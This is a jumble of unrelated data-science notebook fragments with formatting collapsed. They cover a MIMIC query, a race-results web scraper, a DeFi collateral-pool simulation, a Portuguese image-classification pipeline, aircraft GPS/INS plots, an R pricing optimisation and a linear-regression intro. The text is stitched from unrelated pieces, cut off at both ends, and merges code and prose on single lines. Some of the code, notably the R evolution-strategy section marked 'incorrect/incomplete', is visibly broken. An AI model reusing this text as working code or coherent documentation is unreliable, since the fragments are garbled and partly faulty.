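t_adm.filter([t_adm.insurance == 'Medicare']).count().execute(limit=None)
```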
Examine [`prescriptions`](https://mimic.physionet.org/mimictables/prescriptions/)For a patient being given medication (medication event), we would want to know things like who the medicine was given to, who gave it to them, what the medicine was, when it was given, etc.Examining the `prescriptions` table we can see the nature of a relational databaset_pre = conn.table("prescriptions", schema=schema) t_pre.info() display(view_dict(conn.table("prescriptions", schema=schema).schema())) view_table("prescriptions", conn)Importing Librariesimport numpy as np import pandas as pd import requests from bs4 import BeautifulSoupParametersurl_base = 'https://secure.tiktok.biz/results/list/sydneyhalfmarathon/2015/21KM' n_max = 200 data_body = {'__EVENTTARGET': 'ctl00$pagePlaceHolder$btnNextT', '__VIEWSTATE': ''}Scraping# First request performed by a HTTP GET call r = requests.get(url_base) # Check if the website is available status_ok = True if (r.status_code == 200): print('First request succeeded') status_ok = True else: print('First request failed') status_ok = False # Parsing of useful data soup = BeautifulSoup(r.content, 'html.parser') state = soup.find(id="__VIEWSTATE")['value'] data_body['__VIEWSTATE'] = state # Here we get the first table of the HTML page table = soup.find('table') print(table.find_all('td')[0]) # to remove, just for the example i = 1; while(status_ok): # Perform a new request by a HTTP POST call r = requests.post(url_base, data = data_body) if (r.status_code == 200): # Parsing of useful data soup = BeautifulSoup(r.content, 'html.parser') state = soup.find(id="__VIEWSTATE")['value'] button = soup.find(id='ctl00_pagePlaceHolder_btnNextT') has_no_next = button.has_attr('disabled') data_body['__VIEWSTATE'] = state # Here we get the first table of the HTML page table = soup.find('table') print(table.find_all('td')[0]) # to remove, just for the example else: print('A request failed') status_ok = False if (i >= n_max): status_ok = False if (has_no_next): status_ok = False i += 1 1. Introduction Collateral Rebalance Pool (CRP) dynamically rebalances Collateral to ensure the ayToken minted (i.e. the loan) remains solvent, especially in an adverse market environment (i.e. the value of the loan does not exceed the value of Collateral). This dynamic rebalancing, together with a careful choice of the key parameters (including the Loan-to-Value (LTV) ratio and the volatility assumption), allows ALEX to eliminate the need for liquidation. Any residual gap risk (which CRP cannot address entirely) is addressed through maintaining a strong reserve fund. When a Borrower mints ayToken by providing appropriate Collateral, the Collateral is converted into a basket of Collateral and Token, with the weights determined by CRP.In this notebook, we will help you understand the key attributes of the CRP pool by answering: 1. How does CRP achieve the dynamic rebalancing with the weights determined by CRP? 2. How does CRP perform in different market environments? 3. How does the power arbitrageur play a role in the dynamic rebalancing and bring the rebate back to the pool? 4. In which parameter space (including LTV, volatility assumption, and power arbitrageur functions) would the CRP maintain a low default risk and a high pool-value-to-collateral ratio (PVCR)? Given there is no closed form for CRP performance, we use simulation to show the results based on predicted future scenarios. 2. CRP dynamic rebalance mechanism The following diagram illustrates how CRP dynamically rebalances with the weights determined by CRP.
Once the pool updates new weights based on the Black-Scholes option-pricing model, the pool will be rebalanced by the Power Arbitrageur to bring the spot price back to the market price. We leave the mathematical formula of the weights to section 5. ![CRP%20diagram.png](attachment:CRP%20diagram.png) 3. CRP performance by Simulations In this section, we want to simulate how CRP performs in different market environments. Basically, a CRP would serve as an agent (bot) responding to the actual market environment by updating the pool weights based on the current token price $p$, the actual price volatility $\eta$, and the estimated price volatility $\sigma$. We simplify the market environment and let the token price follow a linear growth trend with variation, formally a Geometric Brownian Motion (https://en.wikipedia.org/wiki/Geometric_Brownian_motion). By setting up different growth rates $r$ and volatilities $\eta$, we can approximately mimic different market environments. Two metrics a liquidity provider (LP) would be very interested in are 1) the chance of default, i.e., when the LTV > 1 at any time point, and 2) the impermanent loss. We can empirically estimate the default risk and confidence intervals of the impermanent loss for any given parameters by conducting Monte Carlo simulations. For simplicity, token APY is not considered for now. We set the initial weights to 50/50 and the loan lifetime to 91 days, and vary all key parameters over the following parameter space: Pool parameters (1) Initial LTV: range from 0.7 to 0.95 (2) Black-Scholes volatility: $\sigma$ range from 0.1 - 1.0 (3) Rebate rate of the power arbitrageur: 0 - 100% (4) Fee paid as a percentage of the weight change: 0% - 1% (5) Moving average (MA) of rebalancing weights: 1 - 30 Market environment (6) Growth rate: $r$ range from $[-2, 2]$ (corresponding to 25% or 200% of the initial price) (7) Growth rate volatility: $\eta$ range from 0.1 - 1.0 Episode For each parameter setup (1) to (7), we activate the CRP and monitor its performance during the whole loan life term (called an episode). At each scheduled time point t (e.g. daily), we rebalance Collateral and token according to section 5, and record and plot: 1. Token price at time t 2. Rebalanced weight at time t 3. LTV (pool value includes rebate and fee) 4. PVTC (pool value includes rebate and fee) 5. Scatter plot of BTC weight change and impermanent loss ratio. Each episode will be one realization of the CRP based on the selected parameters.# plot of liquidity import scipy import matplotlib.pyplot as plt import matplotlib.animation from matplotlib.widgets import Slider import seaborn as sns import numpy as np import random import pandas as pd from ipywidgets import * from scipy.stats import norm #Import simulation function and class %run rbpool_env_v2.ipynb # an episode example t = np.linspace(91,0,92)/365 Real_vol = 0.5 Growth_rate = 1 LTV0 = 0.8 bs_vol = 0.5 y_price_init = 50000 Collateral = 10000000 pool_init_x = 5000000 pool_init_y = 100 pool_init_wx = 0.5 fee_rate = 0.0015 rebate=0.8 set_random_seed = True example = get_episode_full(t,y_price_init, bs_vol, Growth_rate, Real_vol, Collateral, LTV0, fee_rate, rebate, pool_init_x, pool_init_y, pool_init_wx, ma_window=3) example.head(2) # fix random seed for rw.
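As a stand-alone illustration of the market environment described above, a single Geometric Brownian Motion price path on a daily grid can be simulated as follows. This is only a sketch of the price model, not the `rbpool_env_v2` implementation; the drift, volatility, horizon, and seed are example values:

```python
import numpy as np

def gbm_path(p0, r, eta, n_days, seed=None):
    """Simulate one daily-sampled GBM price path with drift r and volatility eta."""
    rng = np.random.default_rng(seed)
    dt = 1.0 / 365.0
    # log-price increments: (r - eta^2/2)*dt + eta*sqrt(dt)*N(0, 1)
    steps = (r - 0.5 * eta**2) * dt + eta * np.sqrt(dt) * rng.standard_normal(n_days)
    return p0 * np.exp(np.concatenate(([0.0], np.cumsum(steps))))

prices = gbm_path(p0=50000, r=1.0, eta=0.5, n_days=91, seed=42)
print(prices[:5])
```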
# plot key metrics episode_plot(['y_price', 'weights_ytoken', 'ltv_with_rebate', 'pvtc_rebate', 'slippage_rebalance', 'wt_chg'])Fast AutoCV - ExperimentoEste componente utiliza o três arquiteturas presentes na biblioteca [PyTorch](https://pytorch.org/) para a tarefa de classificação de imagens. São elas: ResNet-18, ResNet-50 e VGG16. Cada uma das arquiteturas é treinada aplicando-se no conjunto de treino e validação um dos 3 conjuntos de polices genéricas definidas pelo artigo [Fast AutoAugment](https://arxiv.org/pdf/1905.00397.pdf), sujo código está disponibilizado no [GitHub](https://github.com/kakaobrain/fast-autoaugment).Ao final, o modelo de maior acurácia no conjunto de validação para o dataset utilizado será salvo para futura utilização. **Em caso de dúvidas, consulte os [tutoriais da PlatIAgro](https://platiagro.github.io/tutorials/).** Declaração de parâmetros e hiperparâmetrosDeclare parâmetros com o botão na barra de ferramentas.O parâmetro `dataset` identifica os conjuntos de dados. Você pode importar arquivos de dataset com o botão na barra de ferramentas. Para esse componente, a base de dados deve estar no seguinte formado:- Arquivo CSV chamado dataset.csv contendo as colunas "image_path", "target" e "subset", onde: - image_path: caminho para o arquivo de imagem. - target: resposta esperada da predição, caso exista. - subset: conjunto ao qual a amostra faz parte, pode ser "train", "test", e "val". - Imagens coloridas (3 canais) no formato 224x224 pixels. Caso não estejam nesse formato, o código faz as alterações necesssárias- Cada classe tem sua pasta com suas respectivas imagens, além dos conjuntos de treino, validação e teste terem suas pastas separadas. Um exemplo da árvore de diretórios pode ser observado abaixo:```bashdataset|________dataset.csv|________train| |_____class_name1| | |____image0.jpg| | |____image1.jpg| | ...| || |_____class_name2| |____image3.jpg| |____image4.jpg| ...||________val| |_____class_name1| | |____image5.jpg| | |____image6.jpg| | ...| || |_____class_name2| |____image7.jpg| |____image8.jpg| ...||________test| |_____class_name1| | |____image9.jpg| | |____image10.jpg| | ...| || |_____class_name2| |____image11.jpg| |____image12.jpg| ...```dataset = "/tmp/data/hymenoptera.zip" #@param {type:"string"} arch_list = ["resnet18", "resnet50", "vgg16"] #@param ["resnet18", "resnet50", "vgg16"]{type:"string", multiple: true, label:"Arquiteturas disponíveis para escolha.", description: "Inserir o nome das arquiteturas que deseja utilizar na busca em forma de lista."} aug_polices = ["fa_reduced_cifar10", "fa_resnet50_rimagenet", "fa_reduced_svhn"] #@param ["fa_reduced_cifar10", "fa_resnet50_rimagenet", "fa_reduced_svhn"]{type: "string", multiple: true, label: "Conjuntos de polices disponíveis.", description: "Inserir o nome dos conjuntos de polices que deseja utilizar na busca em forma de lista."} # Quantas predições queremos. # Deve ser menor ou igual ao número de classes top_predictions = 1 #@param {type:"integer", label: "Quantidade de predições desejadas", description: "Define quantas predições se quer ter de resposta para uma predição realizada pela rede. 
Valor máximo é igual ao número total de classes."} # variáveis utilizadas na etapa de treinamento do modelo batch = 8 #@param {type:"integer", label: "Tamanho do batch", description: "Número de amostras utilizadas em cada batch"} epochs = 1 #@param {type:"integer", label: "Número de épocas", description: "Quantidade de épocas que cada arquitetura será treinada."} lr = 0.001 #@param {type:"float", label: "Learning rate", description: "Valor do learning rate utilizado no treinamento"} gamma = 0.1 #@param {type:"float", label: "Gamma", description: "Valor de gamma utilizado na descida do gradiente"} step_size = 7 #@param {type:"integer", label: "Tamanho do passo", description: "Tamanho do passo utilizado na descida do gradiente"} momentum = 0.1 #@param {type:"float", label: "Momentum", description: "Valor do momentum utilizado na descida do gradiente"} # Variáveis globais. Evite modificá-las. ARCH_LIST = ['resnet18', 'resnet50', 'vgg16'] POLICES_LIST = ['fa_reduced_cifar10', 'fa_resnet50_rimagenet', 'fa_reduced_svhn'] CSV_FILENAME = "/tmp/data/best_models_acc.csv" checkpoint_path = "/tmp/data/models-output/" # Caminho para salvar os checkpoints dos modelos treinados output_graphs = "/tmp/data/eval-images/" # Caminha para salvar as imagens dos gráficos de loss e acurácia relativos aos treinamentosExtração de dados do arquivo .zipimport os import zipfile root_folder_name = dataset.split("/")[-1].split(".")[0] root_folder = os.path.join("/tmp/data", root_folder_name) with zipfile.ZipFile(dataset, 'r') as zip_ref: zip_ref.extractall(root_folder) os.makedirs(checkpoint_path, exist_ok=True) os.makedirs(output_graphs, exist_ok=True) dataset_id = root_folder_name # Nome base para salvar os modelosClassificação de Images# Funções auxiliares para imprimir as informações # dos modelos treinados e selecionar o melhor modelo def save_to_csv(csv_path, arch, police, val_acc): """Save a csv file with best models infos""" data = { "dataset": [dataset_id], "architecture_id": [arch], "police_id": [police], "val_acc": [val_acc]} dataframe = pd.DataFrame(data) output_path = os.path.join(csv_path, CSV_FILENAME) if os.path.isfile(output_path): dataframe.to_csv(output_path, mode="a", header=False, index=False) else: dataframe.to_csv(output_path, index=False) def best_models_stats(csv): """Print best model and all trained models""" dataframe = pd.read_csv(csv) dataframe.sort_values(by=["val_acc"], inplace=True, ascending=False) dataframe.reset_index(drop=True, inplace=True) best_cases = dataframe.loc[dataframe['dataset'] == dataset_id].head() print("### TOP 5 BEST MODELS ON {0} DATASET ###\n".format(dataset_id)) print(best_cases, "\n") print("### ALL MODELS TRAINED ON {0} DATASET ### \n".format(dataset_id)) print(dataframe.loc[dataframe['dataset'] == dataset_id], "\n") best_model = best_cases.iloc[0] return best_model import os import sys import pandas as pd import torch import torch.nn as nn import torch.optim as optim from torch import cuda from torch.optim import lr_scheduler from data import LoadData from finetuning import FineTuning from visualizations import ImageVisualization from checkpoint import Checkpoint from models import Model, ModelInfos device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") print(device, type(device)) multi_gpu = False if cuda.is_available(): gpu_count = cuda.device_count() print(gpu_count, ' gpus detected.') if gpu_count > 1: multi_gpu = True l_data = LoadData(root_folder) checkpoint = Checkpoint(dataset_id, multi_gpu, checkpoint_path) criterion = 
nn.CrossEntropyLoss() n_classes = len(os.listdir(os.path.join(root_folder, "train"))) model_ft = FineTuning(arch_list, n_classes)cpu 1. Treinamento dos modelosfor police in aug_polices: assert (police in POLICES_LIST), 'police not found' dataloaders, dataset_sizes, class_names = l_data.load_data_train(police) visual = ImageVisualization(device, dataloaders, output_graphs) for arch in arch_list: assert (arch in ARCH_LIST), 'archictecture not supported' model_train = Model(arch, device, checkpoint) model_name = "{0}_{1}_{2}".format(dataset_id, arch, police) model_path = os.path.join(checkpoint_path, model_name) if not os.path.exists(model_path): model_conv = model_ft.fine_tuning(arch) optimizer_conv = optim.SGD( model_conv.parameters(), lr=lr, momentum=momentum) exp_lr_scheduler = lr_scheduler.StepLR( optimizer_conv, step_size=step_size, gamma=gamma) model_conv, best_model_val_acc = model_train.train_model( model_conv, police, dataloaders, dataset_sizes, criterion, optimizer_conv, exp_lr_scheduler, num_epochs=epochs) save_to_csv(checkpoint_path, arch, police, best_model_val_acc) visual.visualize_results(model_conv.history, dataset_id + '_' + arch + '_' + police) elif os.path.exists(model_path): model_checkpoint = checkpoint.load_checkpoint( arch, checkpoint_path + dataset_id + '_' + arch + '_' + police) exp_lr_scheduler = lr_scheduler.StepLR( model_checkpoint.optimizer, step_size=step_size, gamma=gamma) model_checkpoint, best_model_val_acc = model_train.train_model( model_checkpoint, police, dataloaders,dataset_sizes, criterion, model_checkpoint.optimizer, exp_lr_scheduler, num_epochs=epochs) save_to_csv(checkpoint_path, arch, police, best_model_val_acc) best_model = best_models_stats(os.path.join(checkpoint_path, CSV_FILENAME)) best_model_name = "{0}_{1}_{2}".format(best_model['dataset'], best_model['architecture_id'], best_model['police_id']) best_model_path = os.path.join(checkpoint_path, best_model_name)### TOP 5 BEST MODELS ON hymenoptera-5 DATASET ### dataset architecture_id police_id val_acc 0 hymenoptera-5 resnet18 fa_reduced_cifar10 0.647059 ### ALL MODELS TRAINED ON hymenoptera-5 DATASET ### dataset architecture_id police_id val_acc 0 hymenoptera-5 resnet18 fa_reduced_cifar10 0.6470592. Teste do melhor modelomodel_path = best_model_path dataloaders, dataset_sizes, class_names = l_data.load_data_test() # Run inference for test set model = Model(best_model['architecture_id'], device) acc_per_class, confusion_mtx, report = model.predict_batch( multi_gpu, model_path, dataloaders, dataset_sizes, class_names) print("Acurácia por classe:") for i, name in enumerate(class_names): print("Class: {0} -> Acc: {1}".format(class_names[i], acc_per_class[i])) import seaborn as sns import matplotlib.pyplot as plt ticklabels = class_names ax = plt.axes() sns.heatmap((confusion_mtx/sum(confusion_mtx)), annot=True, xticklabels=ticklabels, yticklabels=ticklabels, fmt='.02%', cmap=sns.light_palette("seagreen", as_cmap=True), linewidths=0.2, ax = ax) ax.set_title('Matriz de Confusão') plt.xlabel('Classe Predita', fontsize = 15) plt.ylabel('Classe Real', fontsize = 15) plt.show() report_df = pd.DataFrame(report).transpose() report_dfSalva métricasUtiliza a função `save_metrics` do [SDK da PlatIAgro](https://platiagro.github.io/sdk/) para salvar métricas. 
Por exemplo: `accuracy`, `precision`, `r2_score`, `custom_score` etc.from platiagro import save_metrics import pandas as pd data = {'class': [class_names[0], class_names[1]], 'accuracy': [acc_per_class[0], acc_per_class[1]] } df_acc = pd.DataFrame(data) df_acc save_metrics(classification_report = report_df) save_metrics(accuracy_per_class = df_acc)Salva modelo e outros resultados do treinamentoEscreve todos artefatos na pasta `/tmp/data/`. A plataforma guarda os artefatos desta pasta para usos futuros como implantação e comparação de resultados.from joblib import dump artifacts = { "model_arch": best_model['architecture_id'], "dataset": best_model['dataset'], "model_police": best_model['police_id'], "model_name": best_model_name, "model_path": best_model_path, "class_names": class_names } dump(artifacts, '/tmp/data/model.joblib')GPS and INSPosition and orientation of Polar 5 and Polar 6 are recorded by an on-board GPS sensor and the internal navigation system (INS). The following example presents the variables recored by these instruments. Data access* To analyse the data they first have to be loaded by importing the (AC)³airborne meta data catalogue. To do so the ac3airborne package has to be installed. More information on how to do that and about the catalog can be found [here](https://github.com/igmk/ac3airborne-intakeac3airborne-intake-catalogue). Get dataimport ac3airborneGPS and INS data of Polar 5:cat = ac3airborne.get_intake_catalog() list(cat.P5.GPS_INS)GPS and INS data of Polar 6:list(cat.P6.GPS_INS)```{note}Have a look at the attributes of the xarray dataset `ds_gps_ins` for all relevant information on the dataset, such as author, contact, or citation information.```ds_gps_ins = cat['P5']['GPS_INS']['AFLUX_P5_RF10'].to_dask() ds_gps_insThe dataset `ds_gps_ins` includes the aircraft's position (`lon`, `lat`, `alt`), attitude (`roll`, `pitch`, `heading`), and the ground speed, vertical speed and true air speed (`gs`, `vs`, `tas`). Load Polar 5 flight phase informationPolar 5 flights are divided into segments to easily access start and end times of flight patterns. 
For more information have a look at the respective [github](https://github.com/igmk/flight-phase-separation) repository.At first we want to load the flight segments of (AC)³airbornemeta = ac3airborne.get_flight_segments()The following command lists all flight segments into the dictionary `segments`:segments = {s.get("segment_id"): {**s, "flight_id": flight["flight_id"]} for platform in meta.values() for flight in platform.values() for s in flight["segments"] }In this example, we want to look at a racetrack pattern during `ACLOUD_P5_RF10`.seg = segments["AFLUX_P5_RF10_rt01"]Using the start and end times of the segment, we slice the data to this flight section.ds_gps_ins_rt = ds_gps_ins.sel(time=slice(seg["start"], seg["end"]))Plots%matplotlib inline import matplotlib.pyplot as plt import matplotlib.dates as mdates import matplotlib.colors as mcolors import numpy as np import ipyleaflet from simplification.cutil import simplify_coords_idx plt.style.use("../mplstyle/book")Plot all flightsdef simplify_dataset(ds, tolerance): indices_to_take = simplify_coords_idx(np.stack([ds.lat.values, ds.lon.values], axis=1), tolerance) return ds.isel(time=indices_to_take) # define colors for the flight tracks colors = [mcolors.to_hex(c) for c in plt.cm.inferno(np.linspace(0, 1, len(cat['P5']['GPS_INS'])))] m = ipyleaflet.Map(basemap=ipyleaflet.basemaps.Esri.NatGeoWorldMap, center=(80., 6), zoom=3) for flight_id, color in zip(cat['P5']['GPS_INS'], colors): # read gps dataset of flight ds = cat.P5.GPS_INS[flight_id].to_dask() # slice to takeoff and landing times ds = ds.sel(time=slice(meta['P5'][flight_id]['takeoff'], meta['P5'][flight_id]['landing'])) # reduce dataset for plotting ds_reduced = simplify_dataset(ds, tolerance=1e-5) track = ipyleaflet.Polyline( locations=np.stack([ds_reduced.lat.values, ds_reduced.lon.values], axis=1).tolist(), color=color, fill=False, weight=2, name=flight_id) m.add_layer(track) m.add_control(ipyleaflet.ScaleControl(position='bottomleft')) m.add_control(ipyleaflet.LegendControl(dict(zip(cat['P5']['GPS_INS'], colors)), name="Flights", position="bottomright")) m.add_control(ipyleaflet.LayersControl(position='topright')) m.add_control(ipyleaflet.FullScreenControl()) display(m)Plot time series of one flightfig, ax = plt.subplots(9, 1, sharex=True) kwargs = dict(s=1, linewidths=0, color='k') ax[0].scatter(ds_gps_ins.time, ds_gps_ins['alt'], **kwargs) ax[0].set_ylabel('alt [m]') ax[1].scatter(ds_gps_ins.time, ds_gps_ins['lon'], **kwargs) ax[1].set_ylabel('lon [°E]') ax[2].scatter(ds_gps_ins.time, ds_gps_ins['lat'], **kwargs) ax[2].set_ylabel('lat [°N]') ax[3].scatter(ds_gps_ins.time, ds_gps_ins['roll'], **kwargs) ax[3].set_ylabel('roll [°]') ax[4].scatter(ds_gps_ins.time, ds_gps_ins['pitch'], **kwargs) ax[4].set_ylabel('pitch [°]') ax[5].scatter(ds_gps_ins.time, ds_gps_ins['heading'], **kwargs) ax[5].set_ylim(-180, 180) ax[5].set_ylabel('heading [°]') ax[6].scatter(ds_gps_ins.time, ds_gps_ins['gs'], **kwargs) ax[6].set_ylabel('gs [kts]') ax[7].scatter(ds_gps_ins.time, ds_gps_ins['vs'], **kwargs) ax[7].set_ylabel('vs [m/s]') ax[8].scatter(ds_gps_ins.time, ds_gps_ins['tas'], **kwargs) ax[8].set_ylabel('tas [m/s]') ax[-1].xaxis.set_major_formatter(mdates.DateFormatter('%H:%M')) plt.show()Plot time series of racetrack patternfig, ax = plt.subplots(9, 1, sharex=True) kwargs = dict(s=1, linewidths=0, color='k') ax[0].scatter(ds_gps_ins_rt.time, ds_gps_ins_rt['alt'], **kwargs) ax[0].set_ylabel('alt [m]') ax[1].scatter(ds_gps_ins_rt.time, ds_gps_ins_rt['lon'], **kwargs) 
ax[1].set_ylabel('lon [°E]') ax[2].scatter(ds_gps_ins_rt.time, ds_gps_ins_rt['lat'], **kwargs) ax[2].set_ylabel('lat [°N]') ax[3].scatter(ds_gps_ins_rt.time, ds_gps_ins_rt['roll'], **kwargs) ax[3].set_ylabel('roll [°]') ax[4].scatter(ds_gps_ins_rt.time, ds_gps_ins_rt['pitch'], **kwargs) ax[4].set_ylabel('pitch [°]') ax[5].scatter(ds_gps_ins_rt.time, ds_gps_ins_rt['heading'], **kwargs) ax[5].set_ylim(-180, 180) ax[5].set_ylabel('heading [°]') ax[6].scatter(ds_gps_ins_rt.time, ds_gps_ins_rt['gs'], **kwargs) ax[6].set_ylabel('gs [kts]') ax[7].scatter(ds_gps_ins_rt.time, ds_gps_ins_rt['vs'], **kwargs) ax[7].set_ylabel('vs [m/s]') ax[8].scatter(ds_gps_ins_rt.time, ds_gps_ins_rt['tas'], **kwargs) ax[8].set_ylabel('tas [m/s]') ax[-1].xaxis.set_major_formatter(mdates.DateFormatter('%H:%M')) plt.show()Problem: Given are the set of five products $\mathcal{I}$, the set of stations $\mathcal{S}$, and the days $\mathcal{T}$ of January 2016. For each product $i$, a quantity $Q_i$ is available at the start of the month to be sold over the course of the month. Goal: The goal is to maximize the profit$$\Pi(q,p) = \sum_{s\in\mathcal{S}}\sum_{t\in\mathcal{T}}\sum_{i\in\mathcal{I}}q_{ist}\cdot p_{ist},$$where $q_{ist}$ is the quantity of product $i$ offered at station $s$ on day $t$ and $p_{ist}$ is the price at which it is offered. The constraints can be stated as follows:\begin{enumerate} \item $\sum_{s\in\mathcal{S}}\sum_{t\in\mathcal{T}} \; q_{ist} \leq Q_i \; \forall i \in \mathcal{I}$ (the offered quantity must not exceed the available supply) \item $p_{ist} \leq \hat{p}_{ist} \; \forall i, s, t$ (the offered price must not exceed the forecasted price) \item $q_{ist} \leq \hat{q}_{ist} \; \forall i, s, t$ (the offered quantity must not exceed the forecasted demand)\end{enumerate}---Improvements:* For quantities that remain unsold, a penalty cost of $C_U$ is charged (see the sketch below).
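One way to fold this penalty into the objective, as a sketch under the assumption that every unit of the initial supply $Q_i$ left unsold at the end of the month is penalized linearly at rate $C_U$:$$\Pi(q,p) = \sum_{s\in\mathcal{S}}\sum_{t\in\mathcal{T}}\sum_{i\in\mathcal{I}} q_{ist}\, p_{ist} \;-\; C_U \sum_{i\in\mathcal{I}} \Bigl(Q_i - \sum_{s\in\mathcal{S}}\sum_{t\in\mathcal{T}} q_{ist}\Bigr),$$where the penalty term is non-negative because of constraint 1.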
Variablen: * $c^Tx \rightarrow min$* $Ax \leq b$* $x \geq 0$wobei:* $x$: zu optimierende Variablen ($q, p$)* $c$: 1-Vektor?# lets find out if there is a correlation between price and demand df.antibiotics <- read.csv('../output/df_antibiotics_imputed.csv', row.names = NULL) df.tengu <- read.csv('../output/df_tengu_imputed.csv', row.names = NULL) df.veldspar <- read.csv('../output/df_veldspar_imputed.csv', row.names = NULL) df.nanite <- read.csv('../output/df_nanite_repair_paste_imputed.csv', row.names = NULL) df.tritanium <- read.csv('../output/df_tritanium_imputed.csv', row.names = NULL) plot(df.antibiotics$dem_avg_p, df.antibiotics$demand) plot(df.tengu$dem_avg_p, df.tengu$demand) plot(df.veldspar$dem_avg_p, df.veldspar$demand) plot(df.nanite$dem_avg_p, df.nanite$demand) plot(df.tritanium$dem_avg_p, df.tritanium$demand)---# forecasts.csv holds forecasted prices in columns prefixed with `p` # as well as forecasted demand in columns prefixed with `d` # all data is for january 2016 df.raw <- read.csv('../output/forecasts.csv', row.names = NULL) product.names <- unique(df.raw$product) print(product.names) head(df.raw) # select the data per product, then remove the product column # there are a total of five products in the data df.tritanium <- df.raw[df.raw$product == 'tritanium', ] stopifnot(dim(df.tritanium)[1] > 0) df.tritanium <- df.tritanium[, !names(df.tritanium) %in% c("product")] df.veldspar <- df.raw[df.raw$product == 'veldspar', ] stopifnot(dim(df.veldspar)[1] > 0) df.veldspar <- df.veldspar[, !names(df.veldspar) %in% c("product")] df.antibiotics <- df.raw[df.raw$product == 'antibiotics', ] stopifnot(dim(df.antibiotics)[1] > 0) df.antibiotics <- df.antibiotics[, !names(df.antibiotics) %in% c("product")] df.tengu <- df.raw[df.raw$product == 'tengu', ] stopifnot(dim(df.tengu)[1] > 0) df.tengu <- df.tengu[, !names(df.tengu) %in% c("product")] df.nanite <- df.raw[df.raw$product == 'nanite repair paste', ] stopifnot(dim(df.nanite)[1] > 0) df.nanite <- df.nanite[, !names(df.nanite) %in% c("product")] # fetch only the forecasted demand per product (also holds forecasted quantity) df.tritanium_dem <- select(df.tritanium, starts_with("d")) df.tengu_dem <- select(df.tengu, starts_with("d")) df.veldspar_dem <- select(df.veldspar, starts_with("d")) df.antibiotics_dem <- select(df.antibiotics, starts_with("d")) df.nanite_dem <- select(df.nanite, starts_with("d")) # only select positive forecasted prices/demand df.tritanium_dem_pos <- df.tritanium_dem[rowSums(df.tritanium_dem > 0) == 31,] df.tengu_dem_pos <- df.tengu_dem[rowSums(df.tengu_dem > 0) == 31,] df.veldspar_dem_pos <- df.veldspar_dem[rowSums(df.veldspar_dem > 0) == 31,] df.antibiotics_dem_pos <- df.antibiotics_dem[rowSums(df.antibiotics_dem > 0) == 31,] df.nanite_dem_pos <- df.nanite_dem[rowSums(df.nanite_dem > 0) == 31,] head(df.antibiotics_dem_pos)ESlibrary("cmaes") init.vector <- function(stations, p = NULL, q = NULL) { # creates a three-dimensional array for # (station, price + demand per day of january (62 entries)) # stations: numerical ids of stations # p: estimated price, if NULL initalized by zeros # q: estimated quantity, if NULL initalized by zeros stations.len <- length(stations) v <- rep(0, stations.len * 62) dim(v) <- c(stations.len, 2, 31) if (is.null(p)) { p <- rep(0, 31) } if (is.null(q)) { q <- rep(0, 31) } for (s in 1:stations.len) { v[s, 1, ] <- p v[s, 2, ] <- q } return(v) } # i.e. 
enc.veldspar <- init.vector(unique(df.veldspar$stationid)) # , q = df.veldspar_dem_pos) cost.function.flat(enc.veldspar) # implements the fitness cost.function.flat <- function(x, max.supply, max = TRUE) { # sum_s sum_t q_st * p_st o <- 0 q <- 0 stations <- dim(x)[1] # TODO: possible improvement # * weight "error" by distance in IQR of estimated demand # by accepting everything in +- 1.5 * estimated demand (as mean) # and "rejecting" everything outside for (s in 1:stations) { q = q + x[s, 1, ] o = o + sum(x[s, 1, ] * x[s, 2, ]) } if (max) { if (q > max.supply) { return 0 } return(o) } else { # minimization if (q > max.supply) { return(Inf) } return(-o) } } # kills the R session … out.veldspar <- cmaes::cma_es(par = enc.veldspar, cost.function.flat, max = FALSE, max.supply = 40000000) #, lower = rep(length(enc.veldspar), 0))Unused# unused and incorrect/incomplete # this code is per product per station! # see: http://www.scholarpedia.org/article/Evolution_strategies # x_k is a matrix in 2x31 # as per convention: # 1. row is the quantity # 2. row is the price # TODO: flatten the tensor to a vector (31 * q, 31 * d, ?) # stop criteria max.iter <- 1e-8 sigma.tolerance <- 1e-12 * sigma.init is.feasible <- function(p, p_hat, Q) { # the x vector is the first element of the individual x_k <- p_hat[1] q = x_k[1] p = x_k[2] if (!all(x_k >= 0)) { return(FALSE) } # exceeds the given supply if (sum(q) > Q) { return(FALSE) } # is in IQR of the estimated price if (!(0.5 * p_hat <= p && p <= 1.5 * p_hat)) { return(FALSE) } return(TRUE) } sort.pop <- function(pop, mu, obj.fun) { ranks <- rank(mapply(pop, FUN = obj.fun)) # TODO: resort population according to rank } # mutates one offspring mutate <- function(x, sigma, mu, rho, parents) { # select rho parents to use for recombination # if mu equals rho, the whole parent population is used if (mu == rho) { considered.pars <- parens } else { considered.pars <- sample(x = parents, size = rho) } sigma_i <- sigma_i * tao * rnorm(1,0) x <- x * sigma_i * rnorm(1, mean = 0) # TODO: mutate until the offsprings are feasible return (x, sigma_i) } # implements the fitness cost.function <- function(x_k, max = TRUE) { # sum_s sum_t q_st * p_st o <- sum(x_k[1,] * x_k[2,]) if (max) { return(o) } return(-o) } es <- function(x_0, is.feasible, cost.function, lambda = 12, mu = 6, sigma_0 = 0.5, max = TRUE, max.iter = 1000, best.fit = FALSE) { tao <- 1 / sqrt(2 * length(x_0)) # every offspring shall adhere to the order of the tuple: # (x, mutation factor, fitness) best.fit <- c(x_0, sigma_0, cost.function(x_0)) population <- rep(best.fit, mu) init.pop <- mapply(mutate, population) pop.sorted <- sort.pop(init.pop) i <- 1 while (i <= max.iter && pop.sorted[1][2] <= sigma.tolerance) { if (pop.sorted[1][3] > best.fit[3]) { best_fit <- c(pop.sorted[1][1], ) } } if (best.fit) { return best.fit } return c(pop.sorted[1]) } # unused: # evolution strategies for one product and as of now, one station lambda = 10 mu = 5 # 31 days of january N = 31 start <- matrix(c(rep(0, N)), c(rep(0, N)), ncol=N, nrow=2) # T: 31 # s: ? 
f <- function(x) { sum(sum(x)) } # supply numbers # tengu, nanite, antibiotics, veldspar, tritanium # b <- c(10, 40000, 1000000, 40000000, 200000000) cma_es(start, f) #, lower, upper, control=list())Introduction to Linear Regression*Adapted from Chapter 3 of [An Introduction to Statistical Learning](http://www-bcf.usc.edu/~gareth/ISL/)*||continuous|categorical||---|---|---||**supervised**|**regression**|classification||**unsupervised**|dimension reduction|clustering| MotivationWhy are we learning linear regression?- widely used- runs fast- easy to use (not a lot of tuning required)- highly interpretable- basis for many other methods LibrariesWill be using [Statsmodels](http://statsmodels.sourceforge.net/) for **teaching purposes** since it has some nice characteristics for linear modeling. However, we recommend that you spend most of your energy on [scikit-learn](http://scikit-learn.org/stable/) since it provides significantly more useful functionality for machine learning in general.# imports import pandas as pd import matplotlib.pyplot as plt # this allows plots to appear directly in the notebook %matplotlib inlineExample: Advertising DataLet's take a look at some data, ask some questions about that data, and then use linear regression 